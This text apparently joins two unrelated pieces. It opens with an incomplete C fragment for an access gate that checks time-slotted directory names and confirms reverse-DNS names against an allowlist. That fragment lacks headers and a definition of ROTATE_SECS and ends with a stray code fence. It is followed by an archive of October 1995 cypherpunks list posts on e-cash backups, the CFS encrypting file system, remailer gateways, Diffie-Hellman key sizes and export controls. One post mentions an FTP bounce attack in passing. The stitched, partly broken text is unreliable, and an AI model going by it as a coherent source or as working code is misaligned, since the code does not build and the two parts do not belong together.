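/* Constructed allowlist entries; the real list is not given in the message. */
static const char *const ALLOWED[] = { "edu", "gov", "example.com" };

enum verdict { ALLOW, DENY_STALE_NAME, DENY_HOST };

/* Tier one: a name belongs to one 30-minute slot. Its remaining life is
   counted from the last rotation, not from when someone learned the name. */
long slot_of(time_t t)        { return (long)(t / ROTATE_SECS); }
long seconds_left(time_t now) { return ROTATE_SECS - (long)(now % ROTATE_SECS); }

/* Case-insensitive suffix match on DNS label boundaries only, so that
   "host.notedu" or "edu.other.example" does not match the entry "edu". */
static int domain_matches(const char *host, const char *entry) {
    size_t hl = strlen(host), el = strlen(entry);
    const char *tail;
    if (hl && host[hl - 1] == '.') hl--;          /* ignore trailing root dot */
    if (el == 0 || hl < el) return 0;
    tail = host + (hl - el);
    if (strncasecmp(tail, entry, el) != 0) return 0;
    return hl == el || tail[-1] == '.';
}

/* Tier two: compare the reverse-DNS name with the allowlist. */
int host_allowed(const char *ptr_name) {
    size_t i;
    if (!ptr_name || !*ptr_name || ptr_name[0] == '.') return 0;
    for (i = 0; i < sizeof ALLOWED / sizeof ALLOWED[0]; i++)
        if (domain_matches(ptr_name, ALLOWED[i])) return 1;
    return 0;
}

/* Both tiers must pass. name_slot is the slot whose directory name the
   client presented (a stand-in for looking the name up on disk). */
enum verdict gate(time_t now, long name_slot, const char *ptr_name) {
    if (name_slot != slot_of(now)) return DENY_STALE_NAME;
    if (!host_allowed(ptr_name)) return DENY_HOST;
    return ALLOW;
}

/* Reverse-resolve an IPv4 address, then forward-confirm the answer. A PTR
   record is asserted by whoever runs the reverse zone for the address, so
   the name is trusted only if it resolves back to the same address.
   Returns 0 and fills out[] on success, -1 otherwise. */
int confirmed_ptr_name(const char *ipv4, char *out, size_t outlen) {
    struct sockaddr_in sa;
    struct addrinfo hints, *res, *p;
    int ok = -1;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    if (inet_pton(AF_INET, ipv4, &sa.sin_addr) != 1) return -1;
    if (getnameinfo((struct sockaddr *)&sa, sizeof sa, out, (socklen_t)outlen,
                    NULL, 0, NI_NAMEREQD) != 0) return -1;
    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(out, NULL, &hints, &res) != 0) return -1;
    for (p = res; p; p = p->ai_next)
        if (((struct sockaddr_in *)p->ai_addr)->sin_addr.s_addr == sa.sin_addr.s_addr)
            ok = 0;
    freeaddrinfo(res);
    return ok;
}

int main(int argc, char **argv) {
    char name[1025];
    time_t now = time(NULL);
    const char *host = "ws1.some-univ.edu";       /* constructed PTR name */
    if (argc > 1)                                 /* optional live lookup */
        host = confirmed_ptr_name(argv[1], name, sizeof name) == 0 ? name : NULL;
    printf("current name valid for %ld more seconds; verdict=%d\n",
           seconds_left(now), (int)gate(now, slot_of(now), host));
    return 0;
}
```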




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 28 Oct 1995 02:19:05 +0800
To: cypherpunks@toad.com
Subject: PRZ On Mitchells
Message-ID: <199510271718.NAA56324@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello again cypherpunks:

[I hope this info. isn't already posted, my sincere apologies if it
has. I get the "digest" version of the firehose these days, and
there's a slight delay on my end.] Anyway, 

I'm informed by my brother in Punta Gorda, FL that "Mitchells in the
Morning" -- a conservative/libertarian husband & wife talkshow on
"National Empowerment Television," featured Phil Zimmermann and
Robert Holliman(sp?) President of the "Business Software Alliance"
this morning. Talk was mostly about how stupid software export
controls are, as PRZ was understandably reluctant to discuss details
of the grand jury investigation.

Humorous sidenote: PRZ said that the Exon <spit!> bill is the
equivalent of turning the entire Internet into the children's room
at the public library. I will be getting a videotape of the show in
about 2 weeks, and if anyone wants me to make them a copy please
e-mail me (privately!) and I will try to oblige.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMJET0W1lp8bpvW01AQGKIwP+L4zvjUp6NewdpJYUL5yHH8g7NZjm2DCN
GyOA4RvzTTFt9c1xZzTPZ4cpxky5+6JrBYClAg0UiyqXBkRf55JDVONrf7NpSUT0
9cLPDzRVxs4Tns+hjVU0G/O29hfQJ6TbxEtqIRmg+GElar4tbC3cYILbc1gnrxOh
FeQ+ltB63oc=
=9umd
-----END PGP SIGNATURE-----
Regards, Jim Ray

Disemboondogglin' -- Reducing the rate of increase in a government
program when adjusted for inflation (as opposed to a "cut"). --
Tom Ray, my brother.

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
Featuring cypherpunk stuff and some babypictures!
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 28 Oct 1995 06:02:35 +0800
To: Steven Levy <steven@echonyc.com>
Subject: Re: newsweek oct 30 Levy digital cash article
In-Reply-To: <Pine.SOL.3.91.951026180246.16411E-100000@echonyc>
Message-ID: <199510272049.NAA29753@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



S.L.:
>>also, my question about whether one loses the downloaded Chaumian bucks
>if one's hard drive crashes was answered in the affirmative by Levy.
>
>But as I said, if the drive is backed up you don't lose it. It's my 
>understanding this is the case with the current Digicash/Twain bucks.  
>But not necessarily with all implementations.

you apparently didn't notice but there were some other posts on this
list about writing down the random seed that a person used to generate
the cash, and then being able to restore the cash somehow based on knowing
the random seed, however privacy is sacrificed in this case apparently.
this with the Chaumian implementation, from what I understood.

if this is true, I wanted to point out in my post that this is a property
that real cash does not have. you cannot ever say to your bank from which
you withdrew cash, "oops, I lost a piece, could you replace it? also, if
someone spends the piece that I lost, tell them they can't?"

how would the bank handle a situation in which the consumer says, "oops,
my hard drive was compromised. all of the following cash was NOT spent
by me." notice this is precisely what happens with stolen credit cards today
all the time. the bank, if it was real cash, would have to say, "sorry,
you're out of luck. it's your responsibility to keep your cash secret".

or, the bank might say, "oh, well, that cash was not spent yet. we can issue
a replacement and bar the cash from being spent". this idea of "replacing"
cash is of course unique to the electronic realm. if the bank does it,
the consumer would be required to notify the bank before the cash is 
spent, again another unusual property unique to e-cash.

I would suggest to all companies developing e-cash that they print up
a carefully designed FAQ in which their cash properties are compared
directly with parallel properties of credit cards such as the item
above, because the consumer is of course very familiar with credit
cards. (this will be very crucial for longterm customer education and
acceptance imho. otherwise
the customer may make assumptions like, "since the cash comes on a card
it behaves like a credit card", etc.)

I would like to see someone elucidate what happens with lost Chaumian cash
in a detailed post (the oneliners I saw so far don't address the complexity 
and seriousness of this issue. this is a really significant issue with digital 
cash IMHO that will become very obvious once people who were used to the 
"mushiness" of credit card transactions switch to cash).
there seem to be many caveats with this "restoration".

one immediate problem I can imagine: the recent netscape bug showed
very well that a short random number generation process can be hacked.
so in other words, if the random numbers are short enough to write down,
it makes me wonder about the security of the cash generated from this
seed.

>This "lose your money" with digital cash really does seem to get to 
>people. I always point out that when you take $ out of an ATM machine, 
>you don't expect to get it back if you lose it.  For those forms of 
>e-money that are irretrievable when lost users are warned not to download
>huge amounts. 

yes, it is clearly an emotional issue. the problem with a lot of technology
is that people are very emotional and irrational, and hyperactively so when it
comes to spending money. all marketing campaigns are designed to 
capitalize on this. various competitors can be tainted merely by
cheap psychological ploys that have no basis in fact. (the back and
forth between AT&T, MCI and Sprint and other competitors is an example
of the endless mudslinging, marginally based on reality, that can ensue.)

as I wrote in my earlier post, the key is to let people know of the weaknesses
in the product ahead of time so they are prepared. and the analogies that
you offer are precisely the kind the company can give to the customer to
make them feel more comfortable that "this stuff is more convenient than
real cash and not really any more dangerous". it's critical that they do
so ahead of time however, before the customer gets zapped by his own naivete.

>Question: will people's worries about losing their e-money lead them to 
>accept a higher degree of traceability as a tradeoff?

that's exactly the issue I tried to raise in my post, unfortunately perhaps in
not the crisp way you do here. (of course, you're the one that makes a living
off your prose, heh.)

one can see advertising as a kind of yin/yang game. you have to imagine
that if your competitor says, "gosh, you could lose cash with so-and-so's
system", you can always reply "yes, but you retain privacy-- can you do
that with so-and-so's system"?  digital cash is not a panacea. it is
in fact a design compromise that simply applies more importance to
various aspects of transaction capabilities: ease of use, privacy, etc.

checks and cash are at two ends of the economic transaction spectrum.
in contrast to other cypherpunks I don't really see either as intrinsically
superior to the other. many businesses may *never* end up using digital
cash in certain transactions (i.e. with other companies, not individual
buyers) for traceability reasons. it seems to me
there are many agreements in which hiding the identity of one or both
parties is simply intrinsically unacceptable to both, and no amount of
handwaving smoke-and-mirrors appeals to magic "reputation agencies" will
completely alleviate this.

so my bottom line is that I think digital cash is going to become a
very, very important part of the future economic ecology, but it will
coexist with other methods. it may very well become the dominant method,
but I suspect there will be significant areas of commerce that actively
resist digital cash technology out of the preferences of all parties.

something the hardcore cypherpunks in general fail to consider, that was 
brought out in a great article in the WSJ about the counterfeit 
$100 superbills circulating:
the cash aspects of the global economy are negligible in comparison to
"identified" transactions such as through credit and checks. (hence the
treasury's lukewarm approach to stopping counterfeiting, which scares
the willies out of me personally). there is absolutely an *enormous*
dedication to "identified" transactions in the world today, and cypherpunks
seem to me to be somewhat misguided in the ways they exalt cash.

it is true that cash is the medium of choice for the individual, but the
vast majority of economic transactions are *not* made by the individual
in virtually any civilized society. digital cash may change this slightly,
but not significantly, I suspect. businesses exchange money as part of
complex agreements and contracts in which liability is a key ingredient.
liability is an exceedingly problematic issue with digital cash. if anyone
is going to create a widespread cash economy based on total anonymity
they have an uphill battle easily far more difficult than Chaum has
encountered so far. (remember Chaum only implements "semi-anonymity", 
anonymity on payer side but not payee side).

--

anyway, congrats on the fine article SL. you get my "honorary 
cypherpunk of the week" award for the article <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@carfax.ims.advantis.com>
Date: Sat, 28 Oct 1995 02:52:51 +0800
To: WOOD@VAX2.ROCKHURST.EDU
Subject: Re: e-mail, business and privicy
In-Reply-To: <01HWXJ7WNGYA000F24@VAX2.ROCKHURST.EDU>
Message-ID: <Pine.A32.3.91.951027140228.14059A-100000@gandalf.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 27 Oct 1995 WOOD@VAX2.ROCKHURST.EDU wrote:

> An old subject, but could someone please give me a pointer 
> to the legalities of reading other people's mail in the working
> environment.

There is a new O'Reilly book out called _Computer Crime_ that covers the
entire arena in more detail than you'll be likely to ever need.  I hope.

It's decidedly oriented towards the law enforcement community, not
"Computer Folk". Though the title focuses on crime, you'll find what 
you need here. 

===========================================================================
     Henry W. Farkas      |     Me?     Speak for IBM?     Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://www.ims.advantis.com/~hfarkas
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
Not to worry, we'll just outlaw all unlicensed cryptography.  After all, it
works in France. You don't see weekly terrorist attacks over there any more
now do you ?             - futplex@pseudonym.com -
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMJEgFqDthkLkvrK9AQF6ygP/VdVcox7kvuW7SWZsnHR2QddZuO0Xp60U
Y6VXMR56WwW8EPyJ4iTvIZ44Nqnt8XshQN22ZVLNQopb3uRpY+MQR68scm6YPBt/
4U+VvgOOopfHKTdJSpqJy8n4M1Y5o1UVnAUIL8oNUhQId55BvFK1GzdtsPRqZLYj
58SLD0+ub3U=
=EoR7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 28 Oct 1995 03:16:34 +0800
To: cypherpunks@toad.com
Subject: QUB_ity
Message-ID: <199510271832.OAA25016@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   CJL has provided the Oct 13 Science article on "Quantum
   Computation," by David DiVincenzo of IBM Research, as
   summarized by the post of October 23.


   QUC_omp  (53 kb in three parts)

   (Math flubs by this ibm-qubity)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 28 Oct 1995 04:52:06 +0800
To: Matt Blaze <mab@research.att.com>
Subject: Re: New release of CFS Unix encrypting file system available
In-Reply-To: <9510271856.AA24314@merckx.info.att.com>
Message-ID: <199510271954.PAA20647@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:
>CFS pushes encryption services into the Unix(tm) file system.  It
>supports secure storage at the system level through a standard Unix
>file system interface to encrypted files.  Users associate a
>cryptographic key with the directories they wish to protect.  Files in
>these directories (as well as their pathname components) are
>transparently encrypted and decrypted with the specified key without
>further user intervention; cleartext is never stored on a disk or sent
>to a remote file server.  CFS employs a novel combination of DES
>stream and codebook cipher modes to provide high security with good
>performance on a modern workstation.  CFS can use any available file
>system for its underlying storage without modification, including
>remote file servers such as NFS.  System management functions, such as
>file backup, work in a normal manner and without knowledge of the key.

What happens to hard links?

mkdir foo bar
CFS_set_directory_key -directory ./foo -key foo-key
CFS_set_directory_key -directory ./bar -key bar-key
cp /etc/passwd ./foo/footest
ln ./foo/footest ./bar/bartest
cmp ./foo/footest ./bar/bartest




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Sat, 28 Oct 1995 03:19:49 +0800
To: cypherpunks@toad.com
Subject: New release of CFS Unix encrypting file system available
Message-ID: <9510271856.AA24314@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Source code for the latest version (release 1.3.1) of CFS, the Cryptographic
File System, is now available upon request for research and experimental
use in the US and Canada.

CFS pushes encryption services into the Unix(tm) file system.  It
supports secure storage at the system level through a standard Unix
file system interface to encrypted files.  Users associate a
cryptographic key with the directories they wish to protect.  Files in
these directories (as well as their pathname components) are
transparently encrypted and decrypted with the specified key without
further user intervention; cleartext is never stored on a disk or sent
to a remote file server.  CFS employs a novel combination of DES
stream and codebook cipher modes to provide high security with good
performance on a modern workstation.  CFS can use any available file
system for its underlying storage without modification, including
remote file servers such as NFS.  System management functions, such as
file backup, work in a normal manner and without knowledge of the key.

CFS runs under SunOS and several other BSD-derived systems with NFS.
It is implemented entirely at user level, as a local NFS server
running on the client machine's "loopback" interface.  It consists of
about 5000 lines of code and supporting documentation.  You must have
"root" access to install CFS.

CFS was first mentioned at the work-in-progress session at the Winter
'93 USENIX Conference and was more fully detailed in:

    Matt Blaze. "A Cryptographic File System for Unix", Proc. 1st ACM
    Conference on Computer and Communications Security, Fairfax, VA,
    November 1993. (PostScript available by anonymous ftp from
    research.att.com in the file dist/mab/cfs.ps.)

and in

    Matt Blaze. "Key Management in an Encrypting File System", Proc.
    Summer '94 USENIX Tech. Conference, Boston, MA, June 1994.
    (PostScript available by anonymous ftp from research.att.com
    in the file dist/mab/cfskey.ps.)

Version 1.3 of CFS also includes ESM, the Encrypting Session Manager.
ESM provides shell-to-shell encrypted sessions across insecure links
and requires no OS or network support.  It is useful for typing cfs
passphrases when logged in over the network.  ESM needs RSAREF 2.0 to
compile and is tested only on SunOS and BSDI.  ESM is the first released
part of a suite of session encryption tools that are described in

    Matt Blaze and Steve Bellovin. "Session-layer Encryption."
    Proc. 1995 USENIX Security Workshop, Salt Lake City, June 1995.
    (PostScript is available from
    ftp://research.att.com/dist/mab/sesscrypt.ps)

The new version of CFS differs from the version described in the
papers in a few ways:

* The DES-based encryption scheme has been strengthened, and now
provides greater security but with the online latency of only single-DES.

* Support for the smartcard-based key management system is not
included and a few of the tools are not included.

* An improved key management scheme now allows changing the passphrase
associated with a directory.

* The performance has been improved.

* The security of the system against certain non-cryptanalytic attacks
has been improved somewhat. 

* User-contributed ports to a number of additional platforms.

* Hooks for adding new ciphers.

* 3-DES, MacGuffin, and SAFER-SK128 encryption options.

* Timeout options allow automatic detach of encrypted directories
after a set time or period of inactivity.

CFS is distributed as a research prototype; it is COMPLETELY
UNSUPPORTED software.  No warranty of any kind is provided.  We will
not be responsible if the system deletes all your files and emails the
cleartext directly to the NSA or your mother.  Also, we do not have
the resources to port the software to other platforms, although you
are welcome to do this yourself.  The software was developed under
SunOS and BSDI, and there are also unsupported user-contributed ports
available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix.  We really
can't promise to provide any technical support at all, beyond the
source code itself.  We also maintain a mailing list for CFS users and
developers; subscription information is included with the source code.

Because of export restrictions on cryptographic software, we are only
able to make the software available within the US and Canada to US and
Canadian citizens and permanent residents.  Unfortunately, we cannot
make it available for general anonymous ftp or other uncontrolled
access, nor can we allow others to do so.  Sorry.

Legal stuff from the README file:

 *              Copyright (c) 1992, 1993, 1994, 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software is subject to United States export controls.  You may
 * not export it, in whole or in part, or cause or allow such export,
 * through act or omission, without prior authorization from the United
 * States government and written permission from AT&T.  In particular,
 * you may not make any part of this software available for general or
 * unrestricted distribution to others, nor may you disclose this software
 * to persons other than citizens and permanent residents of the United
 * States and Canada. 
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.

If you would like a copy of the CFS source code, please read to the end
of this message and then send email to:

	cfs@research.att.com

DO NOT REPLY DIRECTLY TO THIS MESSAGE.  You must include a statement
that you are in the US or Canada, are a citizen or legal permanent
resident of the US or Canada, and have read and understand the license
conditions stated above.  Be sure to include an email address in a US-
or Canada-registered domain. The code will be sent to you via email in
a "shar" shell archive (a little over 300K bytes long).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bluebird@alpha.c2.org
Date: Sat, 28 Oct 1995 06:33:55 +0800
To: cypherpunks@toad.com
Subject: Need Mail-to-News gates
Message-ID: <199510272159.OAA06298@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Could someone PLEASE netmail me some _known reliable_ gates that use the
straight netmail address format (alt.whatnot@bosco.kollege.edu)?

All of the old reliables are shut down and none of the ones listed in
the last remailer helpfile I got work either:

group.name@news.demon.co.uk
group.name@dispatch.demon.co.uk
group.name@bull.com
group.name@cass.ma02.bull.com
group.name@paris.ics.uci.edu
group.name@crs4gw.crs4.it
group.name@berlioz.crs4.it
group.name.usenet@canaima.Berkeley.EDU

NONE of these work, or were nonfunctional when I tested them, anyway.

I use the other gates like mail2news@utopia.hacktic.nl with the
Newsgroups: field format, but the straight address format is useful for
some other purposes.

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 28 Oct 1995 06:40:18 +0800
To: cypherpunks@toad.com
Subject: Re: newsweek oct 30 Levy digital cash article
Message-ID: <v02120d08acb716a45144@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Vlad the Inhaler writes:
>
>you apparently didn't notice but there were some other posts on this
>list about writing down the random seed that a person used to generate
>the cash, and then being able to restore the cash somehow based on knowing
>the random seed, however privacy is sacrificed in this case apparently.
>this with the Chaumian implementation, from what I understood.
>

I would not say that privacy is "sacrificed" if, in fact, Digicash
has implemented this "write down the original random seed" backup
method. Worst case scenario -- you write down the seed, and when the
police break down your door, they find that you've written it down.
Well, if things have progressed to that point, you're in pretty
serious trouble anyhow, and if you're expecting this to happen you
have a simple remedy -- back up & encrypt your wallet rather than
writing the seed down. Or, put the seed in a little text file,
encrypt the text file, and back it up.

I suspect, however, that this means that the Digicash wallet doesn't
pick up new bits of entropy to "groom" its random state. Also, it
was unclear where this state came from, but it's hopefully not just
text entered by the user. (I could see getting the state from something
like keystrokes or mouse clicks, then having the user write down a
checksummed, error-corrected string as a preferred alternative.)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 28 Oct 1995 07:30:20 +0800
To: cypherpunks@toad.com
Subject: groupware position available in Boston
Message-ID: <199510272309.QAA16720@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I recently got word of an interesting groupware development position
in Boston that someone here may be able to benefit from. feel free
to pass on this info.

(contrary to some here who are not impressed with groupware application
potential, in my estimation groupware is soon going to be a key "killer app"
in cyberspace, perhaps the "next" one after Netscape, driving key 
technological advancement in network & software development...  in my
opinion virtually every significant and valuable aspect of the internet
can be boiled down into a subset of the functions of groupware.)

===

From: mike@kni.mv.com (Mike Hren)

...
We are starting a company called Emergent
Systems and are looking for technical partners to help turn our vision into
reality.

We're developing a meta-groupware application that seeks to accelerate the
learning of a workgroup. Called a Discovery Acceleration System, the idea
is to use a text engine to synthesize the collective email dialogue
(voicemail later) of a workgroup into its core concepts (Concept Map) that
can be visualized, hypertext linked to related information sources, and
used as a prioritizer of unsolicited email based on conceptual relevance.
Just as knowledge is born of chaos, this Concept Map emerges from the
workgroup's daily interaction--as opposed to being externally defined by a
static knowledge base.

In a dynamic sense, since the Concept Map is used as a distributed Linker
and Lens between workgroups, it also enables a system of interaction to
emerge at the organizational level.

We are looking for someone with software development experience, and
interest in information retrieval, data visualization, groupware, or
messaging systems. Since most of the components of this system are
commercially available, integration is more important than theoretical
development.  Also, a desire to be part of a start-up effort is a must.

....

If you or anyone you know might be
interested, please email a resume and description of interest.  Thanks for
your time.

Mike Hren
President
Emergent Systems, Inc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 28 Oct 1995 01:23:45 +0800
To: cypherpunks@toad.com
Subject: TWP Ups Net Freedom
Message-ID: <199510271518.QAA21481@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The Washington Post, October 27, 1995


Freedom of Net Speech (Editorial)

Is speech on the Internet like speech in a public square,
or is it more like speech in a privately owned mall,
where leafleters and demonstrators need permission? And
what about universities, where students using university
accounts for e-mail and other messages may find
themselves subjected to disciplinary rules? The latter
problem occurred most recently at Virginia Tech, which
has come under challenge for disciplining a student who
sent a letter described as abusive to another student.

The difficulty of framing such questions or even of
defining the terms they're made up of (Is cyberspace
really a "space," or just the ability of a lot of
machines to talk to one another?) should be ample
illustration of why millions of Internet users are still
sloshing around in a state of legal ambiguity. And that
ambiguity, though congenial to the anarchically inclined
folks who have been in cyberspace since its
not-very-remote beginnings, can't be sustained much
longer as millions of users pile into cyberspace through
commercial, university-owned and workplace hookups. The
providers of these hookups all have an interest in what
their users "say" to other users once they're on line,
but the interests vary. Some providers are afraid -- with
cause -- that they may be liable for pirated, libelous or
other lawbreaking material posted on their accounts, or
(depending on the outcome of assorted legislation) for
transmitting pornographic or indecent material to minors.
Universities have another set of motivations that go
beyond fear of legal vulnerability and that have led many
-- including Virginia Tech -- to institute student
conduct policies that can be used to curb even
non-cyberspace speech.

Virginia Tech authorities say the existing student life
policy prohibits "words or acts" that constitute "abusive
conduct" that "demeans, intimidates, threatens or
otherwise interferes with another person's rightful
actions or comfort," whether on line or off. As with the
notorious "hate speech" regulations at many campuses,
this is a dangerously broad category, though the lines
between interfering with someone's comfort and actually
threatening him are probably drawable by a court.

Technologically oriented civil liberties groups such as
the Electronic Frontier Foundation have been arguing for
some time that if First Amendment rights in cyberspace
aren't codified and nailed down early, tendencies toward
restraint will multiply to cover more and more of the new
"sectors," and this will greatly reduce the potential of
electronic communication both socially and commercially.
An even more cold-eyed pragmatic argument is that speech
restrictions, notoriously hard to enforce in the real
world, are even more so in the virtual one: In one
formulation much repeated by programmers, the Internet
"interprets censorship as a malfunction and detours
around it." Add this to the practical impossibility of
commercial owners monitoring every message sent via
cyberspace, and you have enforcement nightmares. There
are better and broader arguments, though, for being
skeptical of any efforts to restrict the content of
cyberspace speech in ways that go beyond existing and
permitted controls on real-world speech, whether on child
pornography, stalking, libel or the rest.

Universities have some wiggle room here, but for the same
reason university "hate speech" codes or restrictions on
what professors may say in class are a terrible idea,
it's bad practice to restrict student speech on-line.
Free speech is good for the Internet for the same reasons
it's good for the real world.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sat, 28 Oct 1995 01:41:34 +0800
To: cypherpunks@toad.com
Subject: Diffie-Hellman Key Generation
Message-ID: <Pine.3.89.9510271616.A410-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know of software available outside the US for generating 
large (1024-bit or more) Diffie-Hellman keys ? The default key for CTCP 
is only 512 bits, and I'd like to be able to give out some larger keys 
(e.g. 1024 and 2048 bits) so that people have a choice of the level of 
security that they want to use.

Alternatively, does anyone have any pre-generated large keys that I can 
put in there ?

Finally, I'm basing this on comments in 'Applied Cryptography' that D-H
keys should be at least 512 bits and preferably 1024. How does the
difficulty of breaking a D-H exchange with a 512 bit key compare to
breaking a 512 bit RSA key ? 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 28 Oct 1995 06:02:28 +0800
To: cypherpunks@toad.com
Subject: Rabin Patents.
Message-ID: <9510272053.AA28938@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Anyone know who is currently claiming Patent rights over the 
Rabin public key encryption and signature schemes? Is it RSADSI
or Cylink ... or both?

	Phill 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sat, 28 Oct 1995 02:08:35 +0800
To: cypherpunks@toad.com
Subject: Re: Linux security issues
Message-ID: <Pine.3.89.9510271651.A410-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Oct 1995, Bill Frantz wrote:

> However, the pass phrase is not the only dangerous information. 
> Intermediate forms used for decrypting the RSA private keys, and the
> decrypted RSA private keys also have to be protected.  The logic of PGP
> requires that it keep at least one of these around for a long time, so it
> will probably be written to swap space.

Couldn't you use mmap() to map a disk file into your address space, keep 
all your secret data in that part of the address space, and then 
carefully wipe that file before exiting ?

I guess you'd then have the problem that people could just read that file
(if they had the privileges to do so) to find all the secret data rather
than having to trawl through the swap file though.. and you'd still have
to worry about disk buffering. So it probably wouldn't be a big
improvement. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Sat, 28 Oct 1995 01:26:09 +0800
To: cypherpunks@toad.com
Subject: FTP export walls
In-Reply-To: <199510271446.KAA13555@jekyll.piermont.com>
Message-ID: <Pine.HPP.3.91.951027164036.27129A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



>Perry E. Metzger wrote:

>> Michael Froomkin writes:

> > If anyone from MIT is reading this, it would be a real public service to 
> > put on a web site (a) what the system used for the release of PGP is 
> > exactly and (b) what assurances (oral, written, names & dates) was 
> > received from State/Commerce that this was legal.

> I don't think they got any sort of approval from State or Commerce --
> I think they just discussed it with their own lawyers.

Last July *hobbit* (hobbit@avian.org) presented to this list a
description of "The FTP Bounce Attack" and stated that it's trivial to
hack past a defense like this (well, it didn't seem trivial to me, but
I'm not a unix wizard). Obviously, there is no real need for such attacks
with PGP and 'everything' else available at non-US sites, and I guess it
would leave traces? But it would be interesting to know if anybody has
successfully tried it at MIT or some other export-restricted FTP site.

Mats






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sat, 28 Oct 1995 07:35:28 +0800
To: cypherpunks@toad.com
Subject: POINTER: The Money Laundromat
Message-ID: <199510272248.SAA32101@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


J. Orlin Grabbe's essay, "The Money Laundromat", as published in the
November 1995 issue of Liberty, was sent to me via e-mail by someone
who prefers to remain anonymous. After checking for accuracy against
my own hard copy, I have posted it to the following Usenet newsgroups:

alt.security.pgp
alt.society.sovereign
alt.society.anarchy
talk.politics.crypto

I will be making this article available on my Web page shortly as well.
The article covers both the threat and the promise of digicash, with
much detail devoted to electronic surveillance and financial tracking
via PROMIS software. This single paragraph summarizes rather well:


"...the coming battle over financial footprints is inevitable, and perhaps
inevitably bloody. But in the end it is the money laundering regulations that
will have to go. For one thing, advances in the technology of anonymity are
putting financial privacy within the reach of everyone. For another, there is
a growing awareness that the existing laundering statutes have little or no
effect on terrorism or drug-dealing, but instead are related to an upswing in
government-sponsored harassment of targeted political groups."

-- 
http://yakko.cs.wmich.edu/~frogfarm  ..for the best in unapproved information
 S..O).... The statist wields a bad law! -- More --
 @.../.".. You quickly protect your money pouch! -- More --
 .$*...].. The statist vanishes in a puff of smoke. "Greedy bastard!"




